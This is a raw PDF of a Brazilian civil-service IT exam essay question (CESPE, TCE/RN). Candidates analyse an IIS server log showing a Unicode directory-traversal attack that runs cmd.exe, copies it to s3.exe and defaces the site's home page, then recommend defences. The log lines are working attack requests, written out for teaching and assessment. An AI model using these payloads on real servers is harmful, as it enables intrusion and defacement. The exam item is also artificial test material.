%PDF-1.7
%
1 0 obj
<>
endobj
153 0 obj
<>/Font<>>>/Fields 157 0 R>>
endobj
4 0 obj
<>stream
Acrobat Distiller 5.0 (Windows)
2009-11-19T17:30:48Z
2011-08-09T10:56:23-03:00
2011-08-09T10:56:23-03:00
PScript5.dll Version 5.2.2
application/pdf
Jr
TCERN09_002_3.pdf
uuid:3ff4ddb0-3e5e-485d-82c6-9489987098d2
uuid:81e97967-ef34-45a1-b8be-6b2b806ae573
endstream
endobj
3 0 obj
<>
endobj
5 0 obj
<>/ExtGState<>/Font<>/ProcSet[/PDF/Text]/XObject<>>>/Rotate 0/TrimBox[0.05901 0.12 594.961 841.98]/Type/Page>>
endobj
82 0 obj
<>/ExtGState<>/Font<>/ProcSet[/PDF/Text/ImageC]/XObject<>>>/Rotate 0/TrimBox[0.05901 0.12 594.961 841.98]/Type/Page>>
endobj
101 0 obj
<>/ExtGState<>/Font<>/ProcSet[/PDF/Text]/XObject<>>>/Rotate 0/TrimBox[0.05901 0.12 594.961 841.98]/Type/Page>>
endobj
108 0 obj
<>/ExtGState<>/Font<>/ProcSet[/PDF/Text]/XObject<>>>/Rotate 0/TrimBox[0.05901 0.12 594.961 841.98]/Type/Page>>
endobj
116 0 obj
<>/ExtGState<>/Font<>/ProcSet[/PDF/Text]/XObject<>>>/Rotate 0/TrimBox[0.05901 0.12 594.961 841.98]/Type/Page>>
endobj
119 0 obj
<>/ExtGState<>/Font<>/ProcSet[/PDF/Text]/XObject<>>>/Rotate 0/TrimBox[0.05901 0.12 594.961 841.98]/Type/Page>>
endobj
122 0 obj
<>/ExtGState<>/Font<>/ProcSet[/PDF/Text]/XObject<>>>/Rotate 0/TrimBox[0.05901 0.12 594.961 841.98]/Type/Page>>
endobj
125 0 obj
<>/ExtGState<>/Font<>/ProcSet[/PDF/Text]/XObject<>>>/Rotate 0/TrimBox[0.05901 0.12 594.961 841.98]/Type/Page>>
endobj
179 0 obj
<>stream
/CS0 cs 1 scn
/GS0 gs
26.695 815.365 0.96 -788.511 re
f
567.686 815.365 0.96 -788.511 re
f
26.695 815.365 541.951 -0.96 re
f
26.695 27.814 541.951 -0.96 re
f
BT
/T1_0 1 Tf
-0.0001 Tc 0.0002 Tw 6.9589 0 0 6.9589 36.8934 50.2502 Tm
(UnB/CESPE \205 TCE/RN)Tj
/T1_1 1 Tf
0 Tc 8.0387 0 0 8.0387 36.8934 39.0921 Tm
(Cargo: Assessor T\351cnico de Inform\341tica)Tj
-0.0002 Tc 0.0004 Tw 62.642 0 Td
(\205 8 \205)Tj
ET
36.893 58.289 521.434 -0.24 re
f
36.893 47.851 521.434 -0.24 re
f
36.893 805.166 521.434 -23.396 re
f
36.893 805.166 0.96 -23.396 re
f
557.368 805.166 0.96 -23.396 re
f
36.893 805.166 521.434 -0.96 re
f
36.893 782.73 521.434 -0.96 re
f
BT
0 scn
/T1_2 1 Tf
0.0006 Tw 14.9975 0 0 14.9975 221.3031 788.0095 Tm
(PROVA DISCURSIVA )Tj
1 scn
/T1_3 1 Tf
0 Tc 0.0122 Tw 9.9584 0 0 9.9584 36.8934 767.1329 Tm
[(\200)-1433(Nesta prova, fa\347a o que se pede, )12(usando )12(o )12(espa\347o )12(para )12(rascunho indicado no presente caderno. Em seguida, transcreva o texto)]TJ
0.0001 Tc 0.0965 Tw 1.771 -1.398 Td
(para a )Tj
/T1_4 1 Tf
-0.0002 Tc 0.0968 Tw 2.892 0 Td
[(F)-12(O)-12(L)-13(H)-12(A DE TEXTO DEFINITIVO DA PROVA DISCURSIVA)]TJ
/T1_3 1 Tf
0 Tc 0.0966 Tw 27.867 0 Td
(, no local apropriado, pois )Tj
/T1_4 1 Tf
0.0001 Tc 0.0965 Tw 11.253 0 Td
(n\343o ser\343o avaliados)Tj
0 Tc 0.0002 Tw -42.012 -1.41 Td
(fragmentos de texto escritos em locais indevidos)Tj
/T1_3 1 Tf
0 Tw 20.41 0 Td
(.)Tj
0.0002 Tw -22.181 -1.385 Td
[(\200)-1433(Respeite o limite m\341ximo de linhas disponibilizadas, pois qualquer fr\
agmento de texto al\351m desse limite ser\341 desconsiderado.)]TJ
1.4333 Tc 0 Tw 0 -1.41 TD
[(\200N)1434(a)1433( )]TJ
/T1_4 1 Tf
-0.0001 Tc 0.0244 Tw 3.217 0 Td
(folha de texto definitivo)Tj
/T1_3 1 Tf
0 Tc 10.205 0 Td
[(, identifique-se)-12( )-12(a)-12(p)-12(e)-12(n)-12(as no cabe\347alho da primeira p\341gina, pois )]TJ
/T1_4 1 Tf
0.0001 Tc 24.964 0 Td
(n\343o ser\341 avaliado)Tj
/T1_3 1 Tf
-0.0001 Tc 7.542 0 Td
( texto que tenha)Tj
0 Tc 0.0002 Tw -44.157 -1.385 Td
(qualquer assinatura ou marca identificadora fora do local apropriado.)Tj
/T1_5 1 Tf
-0.0001 Tc 0.1871 Tw 8.9985 0 0 8.9985 100.483 664.7894 Tm
[(O administrador de uma rede r)-13(ecebeu um relato comunicando que sua p\341gina na Web foi)]TJ
0.1471 Tw -3.92 -1.427 Td
(alterada. Ele usou o navegador para acessar a p\341gina e confirmar o re\
lato. Seu pr\363ximo passo foi)Tj
0.0001 Tc 0.0002 Tw 0 -1.413 TD
(verificar os )Tj
/T1_6 1 Tf
-0.0001 Tc 0 Tw 5.893 0 Td
(logs )Tj
/T1_5 1 Tf
0.0004 Tw 2.387 0 Td
(do seu servidor )Tj
/T1_7 1 Tf
-0.0002 Tc 0 Tw 8.107 0 Td
(http)Tj
/T1_5 1 Tf
-0.0001 Tc 0.0004 Tw 2.4 0 Td
(, cujas por\347\365es relevantes s\343o exibidas abaixo.)Tj
/T1_8 1 Tf
-0.0004 Tc 0.0001 Tw 8.0387 0 0 8.0387 42.5325 615.5975 Tm
[(1.)-1269(host1.domain.org - - [DD/MMM/YYYY:04:28:41 -0200] "GET )]TJ
0 Tw 2.463 -1.239 Td
(IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0\
%af/winnt/system32/cmd.exe?/)Tj
0 -1.239 TD
(c+dir+c:\\ HTTP/1.1" 200 607)Tj
0.0001 Tw -2.463 -1.239 Td
[(2.)-1269(host1.domain.org - - [DD/MMM/YYYY:04:29:00 -0200] "GET)]TJ
0 Tw 2.463 -1.239 Td
(/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c\
0%af/winnt/system32/cmd.exe?/)Tj
T*
(c+dir+c:\\inetpub HTTP/1.1" 200 493 )Tj
0.0001 Tw -2.463 -1.239 Td
[(3.)-1269(host1.domain.org - - [DD/MMM/YYYY:04:29:06 -0200] "GET)]TJ
0 Tw 2.463 -1.239 Td
(/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c\
0%af/winnt/system32/cmd.exe?/)Tj
T*
(c+dir+c:\\inetpub\\wwwroot HTTP/1.1" 200 828)Tj
0.0001 Tw -2.463 -1.239 Td
[(4.)-1269(host2.domain.org - - [DD/MMM/YYYY:04:30:02 -0200] "GET)]TJ
0 Tw 2.463 -1.239 Td
(/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c\
0%af/winnt/system32/cmd.exe?/)Tj
T*
(c+copy+c:\\winnt\\cmd.exe+c:\\winnt\\s3.exe HTTP/1.0" 502 259)Tj
0.0001 Tw -2.463 -1.239 Td
[(5.)-1269(host2.domain.org - - [DD/MMM/YYYY:04:32:29 -0200] "GET)]TJ
0 Tw 2.463 -1.239 Td
(/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c\
0%af/winnt/system32/cmd.exe?/)Tj
0.0001 Tw T*
(c+copy+c:\\winnt\\cmd.exe+c:\\winnt\\cmd.exe HTTP/1.0" 502 259)Tj
-2.463 -1.239 Td
[(6.)-1269(host2.domain.org - - [DD/MMM/YYYY:04:33:36 -0200] "GET)]TJ
0 Tw 2.463 -1.239 Td
(/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%)Tj
T*
(c0%af/winnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\wi\
nnt\\s3.exe HTTP/1.0" 502 242)Tj
0.0001 Tw -2.463 -1.239 Td
[(7.)-1269(host2.domain.org - - [DD/MMM/YYYY:04:34:11 -0200] "GET)]TJ
0 Tw 2.463 -1.239 Td
(/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c\
0%af/winnt/system32/cmd.exe?/)Tj
T*
(c+echo+W33+waz+h3r3+th+Grup+WeW33+waz+h3r3+>c:\\inetpub\\wwwroot\\Defaul\
t.htm HTTP/1.0" 500 87)Tj
0.0001 Tw -2.463 -1.239 Td
[(8.)-1269(host2.domain.org - - [DD/MMM/YYYY:04:34:28 -0200] "GET)]TJ
0 Tw 2.463 -1.239 Td
(/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c\
0%af/winnt/system32/cmd.exe?/)Tj
T*
(c+echo+W33+waz+h3r3+>c:\\inetpub\\wwwroot\\Default.htm HTTP/1.0" 500 87)Tj
0.0001 Tw -2.463 -1.239 Td
[(9.)-1269(host2.domain.org - - [DD/MMM/YYYY:04:35:55 -0200] "GET )]TJ
0 Tw 2.463 -1.239 Td
(/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c\
0%af/winnt/system32/s3.exe?/)Tj
0.0001 Tw T*
(c+echo+W33+waz+h3r3+ >c:\\inetpub\\wwwroot\\Default.htm HTTP/1.0" 404 46\
1)Tj
-2.463 -1.239 Td
[(10.)-672(host2.domain.org - - [DD/MMM/YYYY:04:37:34 -0200] "GET )]TJ
0 Tw 2.463 -1.239 Td
(/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c\
0%af/winnt/s3.exe?/c+echo+W)Tj
T*
(33+waz+h3r3+>c:\\inetpub\\wwwroot\\Default.htm HTTP/1.0" 502 215)Tj
0.0001 Tw -2.463 -1.239 Td
[(11.)-672(host2.domain.org - - [DD/MMM/YYYY:04:40:09 -0200] "GET )]TJ
0 Tw 2.463 -1.239 Td
(/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c\
0%af/winnt/s3.exe?/c+echo+W)Tj
T*
(33+waz+h3r3+>c:\\inetpub\\wwwroot\\Default.htm HTTP/1.0" 502 215)Tj
0.0001 Tw -2.463 -1.239 Td
[(12.)-672(host2.domain.org - - [DD/MMM/YYYY:04:40:30 -0200] "GET )]TJ
0 Tw 2.463 -1.239 Td
(/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c\
0%af/winnt/s3.exe?/c+echo+W)Tj
T*
(33+waz+h3r3+>c:\\inetpub\\wwwroot\\myweb.dll HTTP/1.0" 502 215)Tj
0.0001 Tw -2.463 -1.239 Td
[(13.)-672(host2.domain.org - - [DD/MMM/YYYY:04:40:51 -0200] "GET)]TJ
0 Tw 2.463 -1.239 Td
(/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c\
0%af/winnt/system32/cmd.exe?/)Tj
T*
(c+dir+c: HTTP/1.1" 200 880)Tj
0.0001 Tw -2.463 -1.239 Td
[(14.)-672(host2.domain.org - - [DD/MMM/YYYY:04:44:38 -0200] "GET )]TJ
0 Tw 2.463 -1.239 Td
(/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c\
0%af/winnt/s3.exe?/c+echo+W)Tj
T*
(33+waz+h3r3+>c:\\inetpub\\wwwroot\\myweb.dll HTTP/1.0" 200 215)Tj
/T1_3 1 Tf
0 Tc 0.0002 Tw 9.9584 0 0 9.9584 36.8934 174.07 Tm
(Considerando as informa\347\365es acima, redija um texto dissertativo qu\
e aborde, necessariamente, os seguintes aspectos.)Tj
/T1_9 1 Tf
0 Tw 10.1983 0 0 10.1983 54.5305 146.3545 Tm
(<)Tj
/T1_3 1 Tf
-0.0239 Tw 9.9584 0 0 9.9584 72.1676 146.3545 Tm
[(Caracteriza\347\343o )-12(do )-12(incidente: Que tipo de ataque ocorreu? Qual foi a vulnerabilidade explor\
ada? O que o )-12(administrador )-12(viu)]TJ
0.0002 Tw 0 -1.385 TD
(na p\341gina? Justifique suas respostas citando a linha correspondente d\
o )Tj
/T1_10 1 Tf
-0.0002 Tc 0 Tw 28.385 0 Td
(log)Tj
/T1_3 1 Tf
0 Tc 1.289 0 Td
(.)Tj
/T1_9 1 Tf
10.1983 0 0 10.1983 54.5305 118.7591 Tm
(<)Tj
/T1_3 1 Tf
-0.0001 Tc 0.0364 Tw 9.9584 0 0 9.9584 72.1676 118.7591 Tm
[(Descri\347\343o d)-12(a)-12( )-12(d)-12(i)-11(n)-12(\342)-12(m)-12(i)-12(ca do incidente: Quantos )]TJ
/T1_10 1 Tf
0 Tc 0 Tw 18.735 0 Td
(hosts )Tj
/T1_3 1 Tf
0.0363 Tw 2.349 0 Td
(participaram? O ataque foi automatizado ou realizado por humanos?)Tj
-0.0001 Tc 0.0003 Tw -21.084 -1.385 Td
(Houve tentativas explorat\363rias? Com ou sem sucesso? Justifique suas r\
espostas citando a linha correspondente do )Tj
/T1_10 1 Tf
-0.0002 Tc 0 Tw 45.795 0 Td
(log)Tj
/T1_3 1 Tf
0 Tc 1.289 0 Td
(.)Tj
/T1_9 1 Tf
10.1983 0 0 10.1983 54.5305 91.1635 Tm
(<)Tj
/T1_3 1 Tf
0.0002 Tw 9.9584 0 0 9.9584 72.1676 91.1635 Tm
(Recomenda\347\365es finais: o que o administrador pode fazer para evitar\
esse ataque?)Tj
ET
36.893 688.785 521.434 -0.96 re
f
0.5 scn
37.253 190.987 198.327 -2.88 re
f
1 scn
36.893 82.525 521.434 -0.96 re
f
BT
1 0 0 rg
/GS1 gs
/TT0 12 Tf
0.5762 Tc 0 Tw 373.222 12 Td
(\r\n)Tj
ET
q
1 0 0 1 219.125 8.7720337 cm
0 g
0 Tc /Fm0 Do
Q
endstream
endobj
181 0 obj
<>/Subtype/Form/Type/XObject>>stream
1 g
1 0 0 1 0 0 cm
220.625 10.272 m
372.6459 10.272 l
372.6459 22.368 l
220.625 22.368 l
220.625 10.272 l
f
endstream
endobj
7 0 obj
<>
endobj
12 0 obj
<>
endobj
84 0 obj
<>
endobj
27 0 obj
<>
endobj
17 0 obj
<>
endobj
22 0 obj
<>
endobj
127 0 obj
<>
endobj
132 0 obj
<>
endobj
137 0 obj
<>
endobj
142 0 obj
<>
endobj
56 0 obj
<>
endobj
151 0 obj
<>
endobj
150 0 obj
<>
endobj
57 0 obj
<>
endobj
58 0 obj
<>
endobj
60 0 obj
<>stream
HTPMo +kMƦ~n{ga$ _DmI77üu큾QF9I+ KAi(rhHnИn }s\GƎi?C;[ T(}]Ƙ퍌
'+$:az
x4?G-OȦLӈE}pg˨gyVP{~jn_DE)7nmhͣh6xjc[
endstream
endobj
59 0 obj
<>stream
HLQoHaAuxfξd\Š/1C@ -:7wswmyYbD_ "J),E}|NF_z~硩=MW._N>.3G)1cef5d!l,RLjxp8x%bG"/$"&)k3NCMM)b%,d@\O3e~ѳnk^s~[qœBi*@v])l~cjuMgEEƇ&b7ݬԝc00˅9hg"[bn~u,87Mw ҝK
?W>)?ܡJι=jC+|wW N O@99Xrhovru¨ A漙'NREx!Q ?Qd%ÐVR{Z.Ԇ] j_ `6
endstream
endobj
143 0 obj
<>
endobj
144 0 obj
<>
endobj
146 0 obj
<>stream
HTMO0>FJb=KQQ2R'vmog_h8C4A8⩷ff^vk eqnWrN6<,Y'7?}oOzK?p8;hhvOz@.!t289mk{BZж}F">?L8c.Kq<VMjMuƙr-e8]l!Zq!E
^J9qYH
,%kX{%!2&Q^mɠJ(nRK#٠3hn-:-s.IOxGnt<~o
endstream
endobj
145 0 obj
<>stream
HLTP Ic6tE"*j$pABrd !£p 9R/g)N:Y8m7avws7;}} z8])Sݲ6+ cr^_k4/
ϯ_oX~^P (+!ZA1hC B6vBP2 2@h'm
8Ѐ G`~ [?ß]\AaAA֪f~j~2ŏ;Wz"aIsxN!I(><#:%:fm32۲x(3h#Ԛjy"IMgF{&ܛVm^{H\|L) K>Fesut́;čxX8&I/cRw3do* hwKrL#Nv?bϘ!KD`05$I[0HӵV3 " `QMu|bQ앋s%DrX,/n=&{QU`)̓?edB9,XF r|{,zwшr\sF7+Zu
[`=ehjEJBEVXo64Qjbnr]sl
͠P8lՑU^(=lk5VcVe"'XCSZ{x MtWd-.U`2)TX+=*:{ݨՁuz ;H.,eF.rJ\S҈I+e|.sB"$EodMGjqTGjwafMl4V0,8J]2ҩ$Z>rvHsVMt1?HG=~cĈvP9T/zUQi{~{xc1lO$lV#w+g1LWTt,36>Ʉ![bk*ֺ=UjWWv+a5~wh